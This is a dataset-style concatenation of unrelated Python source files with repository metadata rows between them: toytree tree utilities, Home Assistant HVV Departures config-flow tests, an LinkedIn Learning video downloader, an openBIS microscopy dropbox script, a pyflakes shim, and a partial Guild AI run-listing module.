# for node in ttree.tree.traverse():
# if not node.is_leaf():
# w = sum([(node.dist - child.dist) ** p for child in node.children])
# ws.append(w)
# return sum(ws)
#######################################################
# Other
#######################################################
def bpp2newick(bppnewick):
"converts bpp newick format to normal newick. ugh."
regex1 = re.compile(r" #[-+]?[0-9]*\.?[0-9]*[:]")
regex2 = re.compile(r" #[-+]?[0-9]*\.?[0-9]*[;]")
regex3 = re.compile(r": ")
new = regex1.sub(":", bppnewick)
new = regex2.sub(";", new)
new = regex3.sub(":", new)
return new.strip()
# TODO: would be useful for (eg., root) to have option to return not mrca,
# and fuzzy match just tips, or nodes, etc...
def normalize_values(vals, nbins=10, minsize=2, maxsize=12):
"""
Distributes values into bins spaced at reasonable sizes for plotting.
Example, this can be used automatically scale Ne values to plot as
edge widths.
"""
# make copy of original
ovals = deepcopy(vals)
# if 6X min value is higher than max then add this
# as a fake value to scale more nicely
vals = list(vals)
if min(vals) * 6 > max(vals):
vals.append(min(vals) * 6)
# sorted vals list
svals = sorted(vals)
# put vals into bins
bins = np.histogram(vals, bins=nbins)[0]
# convert binned vals to widths in 2-12
newvals = {}
sizes = np.linspace(minsize, maxsize, nbins)
for idx, inbin in enumerate(bins):
for num in range(inbin):
newvals[svals.pop(0)] = sizes[idx]
return np.array([newvals[i] for i in ovals])
# def fuzzy_match_tipnames(ttree, names, wildcard, regex, mono=True, retnode=True):
def fuzzy_match_tipnames(ttree, names, wildcard, regex, mrca=True, mono=True):
"""
Used in multiple internal functions (e.g., .root()) and .drop_tips())
to select an internal mrca node, or multiple tipnames, using fuzzy matching
so that every name does not need to be written out by hand.
name: verbose list
wildcard: matching unique string
regex: regex expression
mrca: return mrca node of selected tipnames.
mono: raise error if selected tipnames are not monophyletic
"""
# require arguments
if not any([names, wildcard, regex]):
raise ToytreeError(
"must enter an outgroup, wildcard selector, or regex pattern")
# get list of **nodes** from {list, wildcard, or regex}
tips = []
if names:
if isinstance(names, (str, int)):
names = [names]
notfound = [i for i in names if i not in ttree.get_tip_labels()]
if any(notfound):
raise ToytreeError(
"Sample {} is not in the tree".format(notfound))
tips = [i for i in ttree.treenode.get_leaves() if i.name in names]
# use regex to match tipnames
elif regex:
tips = [
i for i in ttree.treenode.get_leaves() if re.match(regex, i.name)
]
if not any(tips):
raise ToytreeError("No Samples matched the regular expression")
# use wildcard substring matching
elif wildcard:
tips = [i for i in ttree.treenode.get_leaves() if wildcard in i.name]
if not any(tips):
raise ToytreeError("No Samples matched the wildcard")
# build list of **tipnames** from matched nodes
if not tips:
raise ToytreeError("no matching tipnames")
tipnames = [i.name for i in tips]
# if a single tipname matched no need to check for monophyly
if len(tips) == 1:
if mrca:
return tips[0]
else:
return tipnames
# if multiple nodes matched, check if they're monophyletic
mbool, mtype, mnames = (
ttree.treenode.check_monophyly(
tipnames, "name", ignore_missing=True)
)
# get mrca node
node = ttree.treenode.get_common_ancestor(tips)
# raise an error if required to be monophyletic but not
if mono:
if not mbool:
raise ToytreeError(
"Taxon list cannot be paraphyletic")
# return tips or nodes
if not mrca:
return tipnames
else:
return node
| 28.88102
| 84
| 0.53742
|
4a18e63931544787b7523106c5608cb5144cf1d5
| 12,395
|
py
|
Python
|
tests/components/hvv_departures/test_config_flow.py
|
mikan-megane/core
|
837220cce40890e296920d33a623adbc11bd15a6
|
[
"Apache-2.0"
] | 4
|
2020-08-10T20:02:24.000Z
|
2022-01-31T02:14:22.000Z
|
tests/components/hvv_departures/test_config_flow.py
|
jagadeeshvenkatesh/core
|
1bd982668449815fee2105478569f8e4b5670add
|
[
"Apache-2.0"
] | 78
|
2020-07-23T07:13:08.000Z
|
2022-03-31T06:02:04.000Z
|
tests/components/hvv_departures/test_config_flow.py
|
jagadeeshvenkatesh/core
|
1bd982668449815fee2105478569f8e4b5670add
|
[
"Apache-2.0"
] | 3
|
2022-01-17T20:10:54.000Z
|
2022-01-17T20:17:22.000Z
|
"""Test the HVV Departures config flow."""
import json
from unittest.mock import patch
from pygti.exceptions import CannotConnect, InvalidAuth
from homeassistant import data_entry_flow
from homeassistant.components.hvv_departures.const import (
CONF_FILTER,
CONF_REAL_TIME,
CONF_STATION,
DOMAIN,
)
from homeassistant.config_entries import SOURCE_USER
from homeassistant.const import CONF_HOST, CONF_OFFSET, CONF_PASSWORD, CONF_USERNAME
from tests.common import MockConfigEntry, load_fixture
FIXTURE_INIT = json.loads(load_fixture("hvv_departures/init.json"))
FIXTURE_CHECK_NAME = json.loads(load_fixture("hvv_departures/check_name.json"))
FIXTURE_STATION_INFORMATION = json.loads(
load_fixture("hvv_departures/station_information.json")
)
FIXTURE_CONFIG_ENTRY = json.loads(load_fixture("hvv_departures/config_entry.json"))
FIXTURE_OPTIONS = json.loads(load_fixture("hvv_departures/options.json"))
FIXTURE_DEPARTURE_LIST = json.loads(load_fixture("hvv_departures/departure_list.json"))
async def test_user_flow(hass):
"""Test that config flow works."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=FIXTURE_INIT,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.checkName",
return_value=FIXTURE_CHECK_NAME,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.stationInformation",
return_value=FIXTURE_STATION_INFORMATION,
), patch(
"homeassistant.components.hvv_departures.async_setup_entry",
return_value=True,
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["step_id"] == "station"
# step: station
result_station = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
{CONF_STATION: "Wartenau"},
)
assert result_station["step_id"] == "station_select"
# step: station_select
result_station_select = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
{CONF_STATION: "Wartenau"},
)
assert result_station_select["type"] == "create_entry"
assert result_station_select["title"] == "Wartenau"
assert result_station_select["data"] == {
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
CONF_STATION: {
"name": "Wartenau",
"city": "Hamburg",
"combinedName": "Wartenau",
"id": "Master:10901",
"type": "STATION",
"coordinate": {"x": 10.035515, "y": 53.56478},
"serviceTypes": ["bus", "u"],
"hasStationInformation": True,
},
}
async def test_user_flow_no_results(hass):
"""Test that config flow works when there are no results."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=FIXTURE_INIT,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.checkName",
return_value={"returnCode": "OK", "results": []},
), patch(
"homeassistant.components.hvv_departures.async_setup_entry",
return_value=True,
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["step_id"] == "station"
# step: station
result_station = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
{CONF_STATION: "non_existing_station"},
)
assert result_station["step_id"] == "station"
assert result_station["errors"]["base"] == "no_results"
async def test_user_flow_invalid_auth(hass):
"""Test that config flow handles invalid auth."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
side_effect=InvalidAuth(
"ERROR_TEXT",
"Bei der Verarbeitung der Anfrage ist ein technisches Problem aufgetreten.",
"Authentication failed!",
),
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["type"] == "form"
assert result_user["errors"] == {"base": "invalid_auth"}
async def test_user_flow_cannot_connect(hass):
"""Test that config flow handles connection errors."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
side_effect=CannotConnect(),
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["type"] == "form"
assert result_user["errors"] == {"base": "cannot_connect"}
async def test_user_flow_station(hass):
"""Test that config flow handles empty data on step station."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=True,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.checkName",
return_value={"returnCode": "OK", "results": []},
):
# step: user
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
assert result_user["step_id"] == "station"
# step: station
result_station = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
None,
)
assert result_station["type"] == "form"
assert result_station["step_id"] == "station"
async def test_user_flow_station_select(hass):
"""Test that config flow handles empty data on step station_select."""
with patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=True,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.checkName",
return_value=FIXTURE_CHECK_NAME,
):
result_user = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: "api-test.geofox.de",
CONF_USERNAME: "test-username",
CONF_PASSWORD: "test-password",
},
)
result_station = await hass.config_entries.flow.async_configure(
result_user["flow_id"],
{CONF_STATION: "Wartenau"},
)
# step: station_select
result_station_select = await hass.config_entries.flow.async_configure(
result_station["flow_id"],
None,
)
assert result_station_select["type"] == "form"
assert result_station_select["step_id"] == "station_select"
async def test_options_flow(hass):
"""Test that options flow works."""
config_entry = MockConfigEntry(
version=1,
domain=DOMAIN,
title="Wartenau",
data=FIXTURE_CONFIG_ENTRY,
source=SOURCE_USER,
system_options={"disable_new_entities": False},
options=FIXTURE_OPTIONS,
unique_id="1234",
)
config_entry.add_to_hass(hass)
with patch("homeassistant.components.hvv_departures.PLATFORMS", new=[]), patch(
"homeassistant.components.hvv_departures.hub.GTI.init",
return_value=True,
), patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
return_value=FIXTURE_DEPARTURE_LIST,
):
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={CONF_FILTER: ["0"], CONF_OFFSET: 15, CONF_REAL_TIME: False},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert config_entry.options == {
CONF_FILTER: [
{
"serviceID": "HHA-U:U1_HHA-U",
"stationIDs": ["Master:10902"],
"label": "Fuhlsbüttel Nord / Ochsenzoll / Norderstedt Mitte / Kellinghusenstraße / Ohlsdorf / Garstedt",
"serviceName": "U1",
}
],
CONF_OFFSET: 15,
CONF_REAL_TIME: False,
}
async def test_options_flow_invalid_auth(hass):
"""Test that options flow works."""
config_entry = MockConfigEntry(
version=1,
domain=DOMAIN,
title="Wartenau",
data=FIXTURE_CONFIG_ENTRY,
source=SOURCE_USER,
system_options={"disable_new_entities": False},
options=FIXTURE_OPTIONS,
unique_id="1234",
)
config_entry.add_to_hass(hass)
with patch("homeassistant.components.hvv_departures.PLATFORMS", new=[]), patch(
"homeassistant.components.hvv_departures.hub.GTI.init", return_value=True
), patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
return_value=FIXTURE_DEPARTURE_LIST,
):
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
with patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
side_effect=InvalidAuth(
"ERROR_TEXT",
"Bei der Verarbeitung der Anfrage ist ein technisches Problem aufgetreten.",
"Authentication failed!",
),
):
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
assert result["errors"] == {"base": "invalid_auth"}
async def test_options_flow_cannot_connect(hass):
"""Test that options flow works."""
config_entry = MockConfigEntry(
version=1,
domain=DOMAIN,
title="Wartenau",
data=FIXTURE_CONFIG_ENTRY,
source=SOURCE_USER,
system_options={"disable_new_entities": False},
options=FIXTURE_OPTIONS,
unique_id="1234",
)
config_entry.add_to_hass(hass)
with patch("homeassistant.components.hvv_departures.PLATFORMS", new=[]), patch(
"homeassistant.components.hvv_departures.hub.GTI.init", return_value=True
), patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
return_value=FIXTURE_DEPARTURE_LIST,
):
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
with patch(
"homeassistant.components.hvv_departures.hub.GTI.departureList",
side_effect=CannotConnect(),
):
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
assert result["errors"] == {"base": "cannot_connect"}
| 33.141711
| 124
| 0.623477
|
4a18e63af34f4c5b2ee35242c56e345b5c542a17
| 2,540
|
py
|
Python
|
llvd/downloader.py
|
vgoebbels/llvd
|
bc86fa4f2f7b57d61452408bae08966216413dcb
|
[
"MIT"
] | null | null | null |
llvd/downloader.py
|
vgoebbels/llvd
|
bc86fa4f2f7b57d61452408bae08966216413dcb
|
[
"MIT"
] | null | null | null |
llvd/downloader.py
|
vgoebbels/llvd
|
bc86fa4f2f7b57d61452408bae08966216413dcb
|
[
"MIT"
] | null | null | null |
from tqdm import tqdm
import requests
import time
import click
import re
def download_video(url, index, filename):
"""
Downloads a video and saves it by its name plus index for easy sorting
"""
print("\n" + filename + "\n")
maximum_retries = 5
with open(f"{index}-{filename}.mp4", 'wb') as f:
download_size = 0
while maximum_retries > 0:
requests.adapters.HTTPAdapter(max_retries=maximum_retries)
response = requests.get(
url, stream=True, headers={'Accept-Encoding': None, 'Content-Encoding': 'gzip'})
download_size = response.headers.get('content-length')
if download_size is None and maximum_retries > 0:
maximum_retries -= 1
else:
break
pbar = tqdm(
total=int(download_size),
initial=0,
unit='B',
unit_scale=True,
position=0,
leave=True)
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
pbar.set_description("progress")
pbar.update(len(chunk))
pbar.close()
print("\n")
def download_exercises(links):
"""
Downloads exercises
"""
maximum_retries = 5
click.echo(
click.style(f"Downloading exercise files..." + "\n", fg="green"))
for link in links:
filename = re.split("exercises/(.+).zip", link)[1]
with open(f"{filename}.zip", 'wb') as f:
download_size = 0
while maximum_retries > 0:
requests.adapters.HTTPAdapter(max_retries=maximum_retries)
response = requests.get(
link, stream=True, headers={'Accept-Encoding': None, 'Content-Encoding': 'gzip'})
download_size = response.headers.get('content-length')
if download_size is None and maximum_retries > 0:
maximum_retries -= 1
else:
break
pbar = tqdm(
total=int(download_size),
initial=0,
unit='B',
unit_scale=True,
position=0,
leave=True)
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
pbar.set_description("progress")
pbar.update(len(chunk))
pbar.close()
print("\n")
| 32.151899
| 101
| 0.525197
|
4a18e732d4e19c9c904d94532c2042fb942f71de
| 960
|
py
|
Python
|
core-plugins/microscopy/2/dss/drop-boxes/MicroscopyDropbox/MicroscopyDropbox.py
|
aarpon/obit_microscopy_core_technology
|
9402922771129ac8bcf6ea3317563306b1293af1
|
[
"Apache-2.0"
] | 1
|
2018-12-20T23:55:40.000Z
|
2018-12-20T23:55:40.000Z
|
core-plugins/microscopy/2/dss/drop-boxes/MicroscopyDropbox/MicroscopyDropbox.py
|
aarpon/obit_microscopy_core_technology
|
9402922771129ac8bcf6ea3317563306b1293af1
|
[
"Apache-2.0"
] | 3
|
2017-09-25T14:47:51.000Z
|
2019-10-24T06:44:26.000Z
|
core-plugins/microscopy/2/dss/drop-boxes/MicroscopyDropbox/MicroscopyDropbox.py
|
aarpon/obit_microscopy_core_technology
|
9402922771129ac8bcf6ea3317563306b1293af1
|
[
"Apache-2.0"
] | 1
|
2017-09-25T08:12:06.000Z
|
2017-09-25T08:12:06.000Z
|
# -*- coding: utf-8 -*-
"""
@author: Aaron Ponti
"""
import os
import logging
from Processor import Processor
def process(transaction):
"""Dropbox entry point.
@param transaction, the transaction object
"""
# Get path to containing folder
# __file__ does not work (reliably) in Jython
dbPath = "../core-plugins/microscopy/2/dss/drop-boxes/MicroscopyDropbox"
# Path to the logs subfolder
logPath = os.path.join(dbPath, "logs")
# Make sure the logs subfolder exist
if not os.path.exists(logPath):
os.makedirs(logPath)
# Path for the log file
logFile = os.path.join(logPath, "log.txt")
# Set up logging
logging.basicConfig(filename=logFile, level=logging.DEBUG,
format='%(asctime)-15s %(levelname)s: %(message)s')
logger = logging.getLogger("Microscopy")
# Create a Processor
processor = Processor(transaction, logger)
# Run
processor.run()
| 22.325581
| 76
| 0.652083
|
4a18e796648140853dbbd6ca2252fc04b60e2b37
| 287
|
py
|
Python
|
blackmamba/lib/pyflakes/scripts/pyflakes.py
|
oz90210/blackmamba
|
65c82c8e99028d6fbb57098ce82d0a394df215a0
|
[
"MIT"
] | 913
|
2016-07-01T07:54:20.000Z
|
2022-03-30T07:15:23.000Z
|
blackmamba/lib/pyflakes/scripts/pyflakes.py
|
oz90210/blackmamba
|
65c82c8e99028d6fbb57098ce82d0a394df215a0
|
[
"MIT"
] | 405
|
2016-06-25T14:54:20.000Z
|
2022-03-23T14:22:10.000Z
|
blackmamba/lib/pyflakes/scripts/pyflakes.py
|
oz90210/blackmamba
|
65c82c8e99028d6fbb57098ce82d0a394df215a0
|
[
"MIT"
] | 249
|
2015-01-07T22:49:49.000Z
|
2022-03-18T02:32:06.000Z
|
"""
Implementation of the command-line I{pyflakes} tool.
"""
from __future__ import absolute_import
# For backward compatibility
__all__ = ['check', 'checkPath', 'checkRecursive', 'iterSourceCode', 'main']
from pyflakes.api import check, checkPath, checkRecursive, iterSourceCode, main
| 31.888889
| 79
| 0.773519
|
4a18e8570c52ba995ae01b1653564d623b7f16f5
| 54,569
|
py
|
Python
|
guild/commands/runs_impl.py
|
guildai/guild-python2
|
8f83e8234fc4b268b6f29ca7d0f1b93148e4d2a6
|
[
"Apache-2.0"
] | null | null | null |
guild/commands/runs_impl.py
|
guildai/guild-python2
|
8f83e8234fc4b268b6f29ca7d0f1b93148e4d2a6
|
[
"Apache-2.0"
] | null | null | null |
guild/commands/runs_impl.py
|
guildai/guild-python2
|
8f83e8234fc4b268b6f29ca7d0f1b93148e4d2a6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017-2022 RStudio, PBC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import inspect
import json
import logging
import os
import re
import six
# IMPORTANT: Keep expensive imports out of this list. This module is
# used by several commands and any latency here will be automatically
# applied to those commands. If the import is used once or twice, move
# it into the applicable function(s). If it's used more than once or
# twice, move the command impl into a separate module (see
# publish_impl for example).
from guild import cli
from guild import cmd_impl_support
from guild import config
from guild import exit_code
from guild import flag_util
from guild import op_util
from guild import remote_run_support
from guild import run as runlib
from guild import run_util
from guild import util
from guild import var
from guild import yaml_util
from . import remote_impl_support
log = logging.getLogger("guild")
RUN_DETAIL = [
"id",
"operation",
"from",
"status",
"started",
"stopped",
"marked",
"label",
"sourcecode_digest",
"vcs_commit",
"run_dir",
"command",
"exit_status",
"pid",
]
ALL_RUNS_ARG = [":"]
LATEST_RUN_ARG = ["1"]
CORE_RUN_ATTRS = [
"cmd",
"comments",
"compare",
"deps",
"env",
"exit_status",
"flags",
"host",
"id",
"initialized",
"label",
"marked",
"objective",
"op",
"pip_freeze",
"platform",
"random_seed",
"run_params",
"sourcecode_digest",
"started",
"stopped",
"tags",
"user",
"user_flags",
"vcs_commit",
]
LEGACY_RUN_ATTRS = [
"resolved_deps",
"opdef",
]
RUNS_PER_GROUP = 20
FILTERABLE = [
("completed", "status_completed"),
("error", "status_error"),
("pending", "status_pending"),
("running", "status_running"),
("staged", "status_staged"),
("terminated", "status_terminated"),
]
if not os.getenv("SHELL"):
# Windows command prompt wants a space buffer to avoid wrapping.
STYLE_TABLE_WIDTH_ADJ = -1
else:
STYLE_TABLE_WIDTH_ADJ = 0
STOP_TIMEOUT = 30
CHILD_TERM_TIMEOUT = 5
def runs_for_args(args, ctx=None):
filtered = filtered_runs(args, ctx)
return select_runs(filtered, args.runs, ctx)
def filtered_runs(args, ctx=None):
if getattr(args, "remote", None):
return remote_impl_support.filtered_runs(args)
else:
return var.runs(
_runs_root_for_args(args),
sort=["-timestamp"],
filter=_runs_filter(args, ctx),
)
def _runs_root_for_args(args):
archive = getattr(args, "archive", None)
deleted = getattr(args, "deleted", False)
if archive and deleted:
cli.error("--archive and --deleted cannot both be used")
if archive:
return archive
else:
return var.runs_dir(deleted=deleted)
def _runs_filter(args, ctx):
filters = []
_apply_status_filter(args, filters)
_apply_ops_filter(args, filters)
_apply_labels_filter(args, filters)
_apply_tags_filter(args, filters)
_apply_comments_filter(args, filters)
_apply_marked_filter(args, filters)
_apply_started_filter(args, ctx, filters)
_apply_sourcecode_digest_filter(args, filters)
return var.run_filter("all", filters)
def _apply_status_filter(args, filters):
status_filters = [
var.run_filter("attr", "status", status)
for status, args_attr in FILTERABLE
if getattr(args, args_attr, False)
]
if status_filters:
filters.append(var.run_filter("any", status_filters))
def _apply_ops_filter(args, filters):
if args.filter_ops:
filters.append(_op_run_filter(args.filter_ops))
def _op_run_filter(op_refs):
def f(run):
opspec = run_util.format_operation(run, nowarn=True)
return any((_compare_op(ref, opspec) for ref in op_refs))
return f
def _compare_op(ref, opspec):
if ref.startswith("^") or ref.endswith("$"):
return _re_match(ref, opspec)
else:
return _opspec_match(ref, opspec)
def _re_match(pattern, target):
try:
return re.search(pattern, target)
except re.error:
return False
def _opspec_match(ref, opspec):
ref_parts = _split_opspec(ref)
opspec_parts = _split_opspec(opspec)
assert len(ref_parts) == 3 and len(opspec_parts) == 3, (ref_parts, opspec_parts)
for ref_part, opspec_part in zip(ref_parts, opspec_parts):
if not _opspec_part_match(ref_part, opspec_part):
return False
return True
def _split_opspec(opspec):
parsed = op_util.parse_opspec(opspec)
if parsed:
model, op = parsed
pkg, model = _split_model_pkg(model)
return pkg, model, op
return None, None, None
def _split_model_pkg(model):
if model:
parts = model.split("/", 1)
if len(parts) == 2:
return parts
return None, model
def _opspec_part_match(ref, part):
if not ref:
return True
if not part:
return False
if "*" in ref:
return _opspec_part_fnmatch(ref, part)
else:
return ref == part
def _opspec_part_fnmatch(ref, part):
from fnmatch import fnmatch
return fnmatch(part, ref)
def _apply_labels_filter(args, filters):
if args.filter_labels and args.filter_unlabeled:
cli.error("--label and --unlabeled cannot both be used")
if args.filter_labels:
filters.append(_labels_filter(args.filter_labels))
elif args.filter_unlabeled:
filters.append(_unlabeled_filter())
def _labels_filter(filter_vals):
def f(run):
run_label = str(run.get("label", "")).strip()
return any((_match_label(s, run_label) for s in filter_vals))
return f
def _match_label(s, run_label):
if s == "-":
return not run_label
return s in run_label
def _unlabeled_filter():
def f(run):
return not run.get("label", "").strip()
return f
def _apply_tags_filter(args, filters):
if args.filter_tags:
filters.append(_tags_filter(args.filter_tags))
def _tags_filter(tags):
def f(run):
run_tags = run.get("tags") or []
return any((t in run_tags for t in tags))
return f
def _apply_comments_filter(args, filters):
if args.filter_comments:
filters.append(_comments_filter(args.filter_comments))
def _comments_filter(filter_vals):
def f(run):
comment_text = _run_comments_text(run)
return any((_match_comments(s, comment_text) for s in filter_vals))
return f
def _run_comments_text(run):
comments = run.get("comments") or []
return "\n".join([_run_comment_filter_text(comment) for comment in comments])
def _run_comment_filter_text(comment):
return "\n".join(
[
(comment.get("user") or "").lower(),
(comment.get("host") or "").lower(),
(comment.get("body") or "").lower(),
]
)
def _match_comments(s, comment_text):
if s == "-":
return not comment_text
return s.lower() in comment_text
def _apply_marked_filter(args, filters):
if args.filter_marked and args.filter_unmarked:
cli.error("--marked and --unmarked cannot both be used")
if args.filter_marked:
filters.append(_marked_filter())
if args.filter_unmarked:
filters.append(_marked_filter(False))
def _marked_filter(test_for=True):
def f(run):
marked = bool(run.get("marked"))
return marked if test_for is True else not marked
return f
def _apply_started_filter(args, ctx, filters):
if args.filter_started:
start, end = _parse_timerange(args.filter_started, ctx)
log.debug("time range filter: %s to %s", start, end)
filters.append(_started_filter(start, end))
def _parse_timerange(spec, ctx):
from guild import timerange
try:
return timerange.parse_spec(spec)
except ValueError as e:
cli.error("invalid RANGE: %s%s" % (e, _range_help_suffix(ctx)))
def _apply_sourcecode_digest_filter(args, filters):
if args.filter_digest:
filters.append(_digest_filter(args.filter_digest))
def _digest_filter(prefix):
def f(run):
return run.get("sourcecode_digest", "").startswith(prefix)
return f
def _range_help_suffix(ctx):
if not ctx:
return ""
return "\nTry '%s --help' for help specifying time ranges." % ctx.command_path
def _started_filter(start, end):
def f(run):
started = run.timestamp
if not started:
log.debug("%s no timestamp, skipping", run.id)
return False
started = datetime.datetime.fromtimestamp(started // 1000000)
if start and started < start:
log.debug("%s timestamp %s < %s, skipping", run.id, started, start)
return False
if end and started >= end:
log.debug("%s timestamp %s >= %s, skipping", run.id, started, start)
return False
log.debug("%s timestamp %s in range", run.id, started)
return True
return f
def select_runs(runs, select_specs, ctx=None):
if not select_specs:
return runs
selected = []
for spec in select_specs:
try:
slice_start, slice_end = _parse_slice(spec)
except ValueError:
selected.append(_find_run_by_id(spec, runs, ctx))
else:
if _in_range(slice_start, slice_end, runs):
selected.extend(runs[slice_start:slice_end])
else:
selected.append(_find_run_by_id(spec, runs, ctx))
return selected
def _parse_slice(spec):
try:
index = int(spec)
except ValueError:
m = re.match("(\\d+)?:(\\d+)?", spec)
if m:
try:
return (_slice_part(m.group(1), decr=True), _slice_part(m.group(2)))
except ValueError:
pass
raise ValueError(spec)
else:
return index - 1, index
def _slice_part(s, decr=False):
if s is None:
return None
elif decr:
return int(s) - 1
else:
return int(s)
def _find_run_by_id(id_part, runs, ctx):
matches = [run for run in runs if run.id.startswith(id_part)]
return cmd_impl_support.one_run(matches, id_part, ctx)
def _in_range(slice_start, slice_end, l):
return (slice_start is None or slice_start >= 0) and (
slice_end is None or slice_end <= len(l)
)
def list_runs(args, ctx=None):
if args.remote:
remote_impl_support.list_runs(args)
else:
_check_list_runs_args(args, ctx)
_list_runs(args, ctx)
def _check_list_runs_args(args, ctx):
cmd_impl_support.check_incompatible_args(
[
("comments", "verbose"),
("comments", "json"),
("json", "verbose"),
("archive", "deleted"),
],
args,
ctx,
)
def _list_runs(args, ctx):
if args.archive and not os.path.exists(args.archive):
cli.error("%s does not exist" % args.archive)
runs = filtered_runs(args, ctx=ctx)
if args.comments:
_list_runs_comments(_limit_runs(runs, args), comment_index_format=False)
elif args.json:
if args.limit or args.more or args.all:
cli.note("--json option always shows all runs")
_list_runs_json(runs)
else:
_list_runs_(_limit_runs(runs, args), args)
def _list_runs_json(runs):
runs_data = [_listed_run_json_data(run) for run in runs]
cli.out(json.dumps(runs_data))
def _listed_run_json_data(run):
run_data = _run_data(
run,
(
"exit_status",
"cmd",
"comments",
"marked",
"label",
"started",
"status",
"stopped",
"tags",
),
)
_apply_batch_proto(run, run_data)
return run_data
def _run_data(run, attrs):
data = {
"id": run.id,
"run_dir": run.path,
"opref": str(run.opref) if run.opref else "",
}
data.update({name: _run_attr(run, name) for name in attrs})
return data
def _run_attr(run, name):
base_attrs = ("status",)
if name in base_attrs:
return getattr(run, name)
else:
return run.get(name)
def _apply_batch_proto(run, data):
proto_dir = run.guild_path("proto")
if os.path.exists(proto_dir):
proto = runlib.for_dir(proto_dir)
data["batch_proto"] = _listed_run_json_data(proto)
def _list_runs_(runs, args):
formatted = format_runs(_limit_runs(runs, args))
cols = [
"index",
"op_desc",
"started",
"status_with_remote",
"label",
]
detail = RUN_DETAIL if args.verbose else None
cli.table(formatted, cols, detail=detail, max_width_adj=STYLE_TABLE_WIDTH_ADJ)
def _limit_runs(runs, args):
if args.all:
if args.limit is not None:
cli.error("--all and --limit cannot both be used")
return runs
if args.limit and args.limit > 0:
return runs[: args.limit]
limited = runs[: (args.more + 1) * RUNS_PER_GROUP]
if len(limited) < len(runs):
cli.note(
"Showing the first %i runs (%i total) - use --all "
"to show all or -m to show more" % (len(limited), len(runs))
)
return limited
def format_runs(runs):
formatted = []
for i, run in enumerate(runs):
try:
formatted_run = run_util.format_run(run, i + 1)
except Exception:
log.exception("formatting run in %s", run.path)
else:
formatted.append(formatted_run)
_apply_op_desc(formatted)
return formatted
def _apply_op_desc(formatted):
for fmt_run in formatted:
op_desc = _op_desc_base(fmt_run)
marked_suffix = " [marked]" if fmt_run["marked"] == "yes" else ""
fmt_run["op_desc"] = op_desc + marked_suffix
def _op_desc_base(fmt_run, apply_style=True):
op = fmt_run["operation"]
op_dir = _run_op_dir(fmt_run["_run"])
if not op_dir:
return _empty_style(op, apply_style)
return "%s%s" % (op, _styled_op_dir_suffix(op_dir, apply_style))
def _run_op_dir(run):
run = run.batch_proto or run
opref = run.opref
if opref.pkg_type == "guildfile":
return os.path.dirname(opref.pkg_name)
elif opref.pkg_type == "script":
return opref.pkg_name
elif opref.pkg_type == "import":
return os.path.dirname(opref.pkg_name)
else:
return None
def _empty_style(s, apply_style):
# Pad a string with an empty style for alignment in tables.
if apply_style:
return s + cli.style("", dim=True)
return s
def _styled_op_dir_suffix(op_dir, apply_style):
cwd = os.path.abspath(config.cwd())
if util.compare_paths(op_dir, cwd):
return _empty_style("", apply_style)
